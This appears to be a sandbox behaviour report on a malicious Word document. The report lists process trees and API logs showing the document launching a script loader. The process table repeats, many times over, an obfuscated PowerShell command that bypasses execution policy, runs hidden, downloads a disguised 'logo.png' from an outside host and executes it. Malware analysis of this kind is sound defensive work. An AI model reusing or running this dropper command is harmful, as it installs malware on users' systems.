a7d5e07a...fa3f

Process Overview

»

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x910	Analysis Target	Medium	winword.exe	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n	-
#2	0xb58	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#3	0xba4	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#4	0x83c	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#3
#5	0x848	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#2
#6	0x41c	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#7	0x8b8	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#5
#8	0x31c	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#4
#10	0x838	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#6
#11	0x964	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#10
#12	0x178	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#13	0x538	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#12
#14	0x86c	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#13
#15	0x1ec	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#16	0xba0	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#15
#17	0xbb0	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#18	0xbc4	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#16
#19	0x8c0	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#20	0x41c	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#17
#21	0x568	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#20
#22	0xbcc	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#19
#23	0xafc	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#22
#24	0xb14	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#25	0x154	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#26	0x4fc	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#24
#27	0xc4	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#26
#28	0xa34	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#29	0x828	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#25
#30	0x310	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#29
#31	0x9fc	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#28
#32	0x4d8	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#31
#33	0xb6c	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#34	0x6a8	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#35	0x978	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#36	0x71c	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#37	0x8c0	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#35
#38	0xb44	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#34
#39	0xc04	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#33
#40	0xc54	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#37
#41	0xc5c	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#39
#42	0xc64	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#38
#43	0xc6c	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#36
#44	0xce0	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#43
#45	0xd50	Child Process	Medium	wscript.exe	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"	#1
#46	0xd88	Child Process	Medium	cmd.exe	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu	#45
#47	0xda4	Child Process	Medium	powershell.exe	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');	#46

Process #1: winword.exe

0

»

Information	Value
ID	#1
File Name	c:\program files\microsoft office\root\office16\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:00:20, Reason: Analysis Target
Unmonitor	End Time: 00:04:10, Reason: Self Terminated
Monitor Duration	00:03:49
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0x910
Parent PID	0x458 (c:\windows\explorer.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 9B8 0x 9B4 0x 9A0 0x 99C 0x 98C 0x 988 0x 984 0x 97C 0x 974 0x 970 0x 96C 0x 960 0x 954 0x 950 0x 94C 0x 928 0x 924 0x 920 0x 91C 0x 918 0x 914 0x A2C 0x A44 0x B54 0x B60 0x BA0 0x BAC 0x 52C 0x 8F0 0x 80C 0x 940 0x 4F4 0x 978 0x 260 0x 874 0x 90 0x A20 0x A3C 0x A34 0x AD4 0x 858 0x BC0 0x 8D4 0x 820 0x 8F8 0x 8C8 0x 5C8 0x BE4 0x A3C 0x B08 0x 71C 0x 6BC 0x B84 0x 5CC 0x 8D4 0x 178 0x 6FC 0x 70C 0x 4F4 0x A3C 0x 4B4 0x 9A8 0x 184 0x B84 0x 6FC 0x 95C 0x A3C 0x 8CC 0x 6EC 0x 288 0x D04 0x D0C 0x D1C 0x D20 0x D28 0x D58 0x F10

Process #2: wscript.exe

185

0

»

Information	Value
ID	#2
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:43, Reason: Child Process
Unmonitor	End Time: 00:00:51, Reason: Self Terminated
Monitor Duration	00:00:07

OS Process Information

»

Information	Value
PID	0xb58
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B5C 0x B64 0x B68 0x B6C 0x B70 0x B94 0x B98 0x B9C 0x 40C 0x 500

Threads

Thread 0xb5c

184

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:48 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 116595	1	Fn
System	Get Time	type = Performance Ctr, time = 16803872105	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff410000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 176, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:49 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 117718	1	Fn
System	Get Time	type = Performance Ctr, time = 16959931693	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegQueryValueExA, address_out = 0x7fefd72c480	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 117749	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = Ìô%	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:50 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 118030	1	Fn
System	Get Time	type = Performance Ctr, time = 17068980236	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:50 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 118092	1	Fn
System	Get Time	type = Performance Ctr, time = 17084286444	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 118404	1	Fn
System	Get Time	type = Ticks, time = 118810	1	Fn
System	Get Time	type = Ticks, time = 118935	1	Fn
System	Get Time	type = Ticks, time = 119184	2	Fn
System	Get Time	type = Ticks, time = 119293	2	Fn
System	Get Time	type = Ticks, time = 119309	8	Fn
System	Get Time	type = Ticks, time = 119449	3	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = Ticks, time = 119824	3	Fn
System	Get Time	type = Ticks, time = 119871	3	Fn
System	Get Time	type = Ticks, time = 119886	3	Fn
System	Get Time	type = Ticks, time = 119902	4	Fn
System	Get Time	type = Ticks, time = 119917	3	Fn
System	Get Time	type = Ticks, time = 119949	4	Fn
System	Get Time	type = Ticks, time = 120011	4	Fn
System	Get Time	type = Ticks, time = 120027	2	Fn
System	Get Time	type = Ticks, time = 120214	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x7fefea4a4c4	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetClassObject, address_out = 0x7fefea62e18	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:45:52 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 120432	1	Fn
System	Get Time	type = Performance Ctr, time = 17360966794	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff410000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wscript.exe, function = 1, address_out = 0xff41d7f8	1	Fn
System	Get Time	type = Ticks, time = 120448	1	Fn
COM	Get Class ID	cls_id = 13709620-C279-11CE-A49E-444553540000, prog_id = shell.applicatiOn	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = Ticks, time = 120448	3	Fn
Process	Create	process_name = cmd.exe, show_window = 2470192	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0xb68

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 875104		1	Fn

Process #3: wscript.exe

181

0

»

Information	Value
ID	#3
File Name	c:\windows\system32\wscript.exe
Command Line	"C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:00:46, Reason: Child Process
Unmonitor	End Time: 00:00:51, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0xba4
Parent PID	0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x BA8 0x BB0 0x BB4 0x BB8 0x BBC 0x BC0 0x BC4 0x BC8 0x 484 0x 808

Threads

Thread 0xba8

180

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:45:51 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 118779	1	Fn
